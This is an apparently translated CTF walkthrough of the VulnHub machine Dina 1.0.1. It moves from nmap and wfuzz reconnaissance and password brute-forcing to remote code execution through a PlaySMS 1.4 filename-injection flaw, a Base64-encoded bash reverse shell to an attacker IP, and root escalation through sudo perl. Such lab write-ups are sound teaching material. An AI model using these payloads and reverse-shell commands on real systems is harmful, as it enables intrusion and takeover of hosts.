This post was originally written in Spanish and translated into English using a large language model (LLM). Although the translation has been reviewed, it may contain inaccuracies or inconsistencies.

Description

In this post, we exploit Dina 1.0.1 using reconnaissance and brute-force techniques, a vulnerable form that gives us RCE through command injection, and privilege escalation through sudo.

Reconnaissance

We scan the victim, 192.168.1.63, with nmap to find open ports.

1
2
3
4
5
6
7
8
nmap --open -p- -T5 192.168.1.63 -oG Puertos
Nmap scan report for 192.168.1.63
Host is up (0.00026s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 2.52 seconds

The only open port is 80, which hosts a web server. We run Nmap’s reconnaissance scripts with -sCV:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
cat Objetivos
───────┬───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
│ File: Objetivos
│ Size: 933 B
───────┼───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
1 │ nmap -sCV -O -p 80 -Pn -oN Objetivos 192.168.1.63
2 │ Nmap scan report for 192.168.1.63
3 │ Host is up (0.00020s latency).
4 │ #!/bin/bash
5 │ PORT STATE SERVICE VERSION
6 │ 80/tcp open http Apache httpd 2.2.22 ((Ubuntu))
7 │ |_http-title: Dina
8 │ |_http-server-header: Apache/2.2.22 (Ubuntu)
9 │ | http-robots.txt: 5 disallowed entries
10 │ |_/ange1 /angel1 /nothing /tmp /uploads
11 │ MAC Address: 08:00:27:FC:43:A5 (Oracle VirtualBox virtual NIC)
12 │ Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
13 │ Device type: general purpose
14 │ Running: Linux 2.6.X|3.X
15 │ OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
16 │ OS details: Linux 2.6.32 - 3.5
17 │ Network Distance: 1 hop
18 │

The results reveal nothing particularly interesting apart from robots.txt. This file asks search engines not to index the listed URLs, but it must be used carefully because it is public and anybody can read it. Let us inspect http://192.168.1.63/robots.txt:

Web Reconnaissance

Robots.Txt

1
2
3
4
5
6
User-agent: *
Disallow: /ange1
Disallow: /angel1
Disallow: /nothing
Disallow: /tmp
Disallow: /uploads

Interesting. Several directories are listed, so let us see what they contain.

After reviewing every directory, the only one that appears useful is /nothing. Let us inspect it:

Even the page itself says there is nothing here. Time to leave…
Not so fast!
That seems suspicious, does it not?
Let us inspect the source code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<html>
<head><title>404 NOT FOUND</title></head>
<body>
<!--
#my secret pass
freedom
password
helloworld!
diana
iloveroot
-->
<h1>NOT FOUND</html>
<h3>go back</h3>
</body>
</html>

Surprise! A wordlist was hidden in an HTML comment, and we almost left empty-handed. We save these credentials because they will be useful later.

You obviously will not find comments this explicit in real pentests. However, source code often reveals software versions or comments about application logic that help you understand and later exploit it. Finding passwords directly is extremely rare, but not impossible.

There are no more obvious leads, so we brute-force additional directories with Wfuzz.

Wfuzz

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
wfuzz -c --hc 404 -u http://192.168.1.63/FUZZ -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://192.168.1.63/FUZZ
Total requests: 220560

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000000003: 200 199 L 429 W 3618 Ch "# Copyright 2007 James Fisher"
000000007: 200 199 L 429 W 3618 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"
000000015: 200 199 L 429 W 3618 Ch "index"
000000014: 200 199 L 429 W 3618 Ch "http://192.168.1.63/"
000000012: 200 199 L 429 W 3618 Ch "# on at least 2 different hosts"
000000011: 200 199 L 429 W 3618 Ch "# Priority ordered case-sensitive list, where entries were found"
000000004: 200 199 L 429 W 3618 Ch "#"
000000002: 200 199 L 429 W 3618 Ch "#"
000000009: 200 199 L 429 W 3618 Ch "# Suite 300, San Francisco, California, 94105, USA."
000000008: 200 199 L 429 W 3618 Ch "# or send a letter to Creative Commons, 171 Second Street,"
000000006: 200 199 L 429 W 3618 Ch "# Attribution-Share Alike 3.0 License. To view a copy of this"
000000010: 200 199 L 429 W 3618 Ch "#"
000000005: 200 199 L 429 W 3618 Ch "# This work is licensed under the Creative Commons"
000000013: 200 199 L 429 W 3618 Ch "#"
000000164: 301 9 L 28 W 314 Ch "uploads"
000000853: 301 9 L 28 W 313 Ch "secure"
000001765: 200 6 L 12 W 102 Ch "robots"
000000001: 200 199 L 429 W 3618 Ch "# directory-list-2.3-medium.txt"
000003237: 301 9 L 28 W 310 Ch "tmp"
000010575: 301 9 L 28 W 314 Ch "nothing"

Secure? Let us see whether it is as secure as its name suggests.

A backup, then… We extract it with 7z x backup.zip and see what it contains.

1
2
3
4
5
6
7
8
9
10
11
Scanning the drive for archives:
1 file, 336 bytes (1 KiB)

Extracting archive: backup.zip
--
Path = backup.zip
Type = zip
Physical Size = 336


Enter password (will not be echoed):

Brute Force

It requires a password, so we are finished here… Wait! We have the wordlist from http://192.168.1.63/nothing/. Let us try its first password, freedom:

1
2
3
4
5
6
Enter password (will not be echoed):
Everything is Ok

Size: 176
Compressed: 336

First try! That is lucky. The archive contains  backup-cred.mp3, apparently an audio file. Could it contain more credentials? Let us listen to it:

That was a good attempt at concealment: the .txt extension was hidden to make the file look like an audio track. Let us see what it contains:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
───────┬───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
│ File: backup-cred.mp3
│ Size: 176 B
───────┼───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
1 │
2 │ I am not toooo smart in computer .......dat the resoan i always choose easy password...with creds backup file....
3 │
4 │ uname: touhid
5 │ password: ******
6 │
7 │
8 │ url : /SecreTSMSgatwayLogin
───────┴───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────

We have a username and a new directory! The password does not appear to be in this file. We visit http://192.168.1.63/SecreTSMSgatwayLogin/.

It is a login panel. We have the potential user touhid and a list of possible passwords: freedom, password, helloworld!, diana, iloveroot. We brute-force them and see whether we are lucky.

Wordlist

1
2
3
4
5
6
freedom ERROR
password ERROR
helloworld! ERROR
diana BINGO
iloveroot ERROR

Exploiting playSMS (Foothold)

The password is diana, giving us access to touhid’s panel. We can now investigate the different playSMS attack vectors. Research reveals several ways to gain direct access to the machine, along with corresponding Metasploit modules. In my opinion, that removes some of the fun, so I keep looking until I find this exploit:

1
2
3
4
5
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
PlaySMS 1.4 - '/sendfromfile.php' Remote Code Execution / Unrestricted File Upload | php/webapps/42003.txt
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------

This vulnerability provides RCE through a form that allows us to “upload” files. The file contents do not cause the RCE because they are not stored on the server; the filename does. Naming a file <?php system('uname -a'); dia();?>.php executes the command on the server:

Form

Result

Boom! RCE was successful. We can now place a reverse shell in the filename and connect to the victim. I use Burp Suite to intercept the request, modify the payload and send it to the server.

Burp Suite

Result

Boom! RCE was successful. We can now place a reverse shell in the filename and connect to the victim. I use Burp Suite to intercept the request, modify the payload and send it to the server.

Burp Suite

Reverse Shell Injection

This approach appears likely to provide a shell, but any command containing / produces an error. While researching ways to avoid that character, I found the solution thanks to NetOsec: send the command as Base64 so that it contains no / characters.

The syntax for converting a string to Base64 is echo -n "cadena" | base64.

The Base64 reverse shell is: bash -i >& /dev/tcp/192.168.1.84/1234 0>&1 = YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuODQvMTIzNCAwPiYx.

We listen on the selected port and inject the Base64 command. The -d parameter decodes it to plaintext, and piping it to bash makes the server interpret the string as a Bash command.

The final command is echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuODQvMTIzNCAwPiYx-n | base64 -d | bash.

Listening with Netcat

1
2
3
❯ nc -lvnp 1234
listening on [any] 1234 ...

Injecting the Reverse Shell with Burp Suite

We forward the request containing the injected shell and…

1
2
3
4
5
❯ nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.168.1.84] from (UNKNOWN) [192.168.1.63] 51716
bash: no job control in this shell
www-data@Dina:/var/www/SecreTSMSgatwayLogin$

Success! Only privilege escalation remains.

Privilege Escalation

www-data –> root

As www-data, we run sudo -l to check for superuser permissions.

1
2
3
4
5
6
7
8
9
sudo -l
Matching Defaults entries for www-data on this host:
env_reset,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on this host:
(ALL) NOPASSWD: /usr/bin/perl
www-data@Dina:/var/www/SecreTSMSgatwayLogin$

This privilege escalation will not take long… We consult GTFOBins.

1
2
3
4
5
6
7
www-data@Dina:/var/www/SecreTSMSgatwayLogin$ whoami
whoami
www-data
www-data@Dina:/var/www/SecreTSMSgatwayLogin$ sudo perl -e 'exec "/bin/sh";'
sudo perl -e 'exec "/bin/sh";'
whoami
root

Privilege escalation is complete. This time it was simple and direct.

Flag

With root privileges, we move to /root/ and read the flag.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
cat flag.txt
________ _________
\________\--------___ ___ ____----------/_________/
\_______\----\\\\\\ //_ _ \\ //////-------/________/
\______\----\\|| (( ~|~ ))) ||//------/________/
\_____\---\\ ((\ = / ))) //----/_____/
\____\--\_))) \ _)))---/____/
\__/ ((( (((_/
| -))) - ))


root password is : hello@3210
easy one .....but hard to guess.....
but i think u dont need root password......
u already have root shelll....


CONGO.........
FLAG : 22d0xxxxxxxxxxxxxxxxxxxxxxxxxxxx

Knowledge Gained

This machine teaches us the following:

  • Reconnaissance with nmap.
  • Web directory reconnaissance with Wfuzz.
  • Exploiting an upload form that fails to sanitise filenames, achieving RCE.
  • Using Burp Suite to modify requests.
  • Privilege escalation through excessive sudo permissions.

Credits and Download

The machine was created by Touhid Shaikh. Thank you for creating Dina 1.0.1 and contributing it to the community. Twitter, website

You can download the machine from VulnHub.

VulnHub is a fantastic platform where ANYONE can upload their own CTFs, so it carries an inherent risk. Before using any machine, I recommend researching its creator and building an isolated environment that minimises the risk in case the machine is malicious.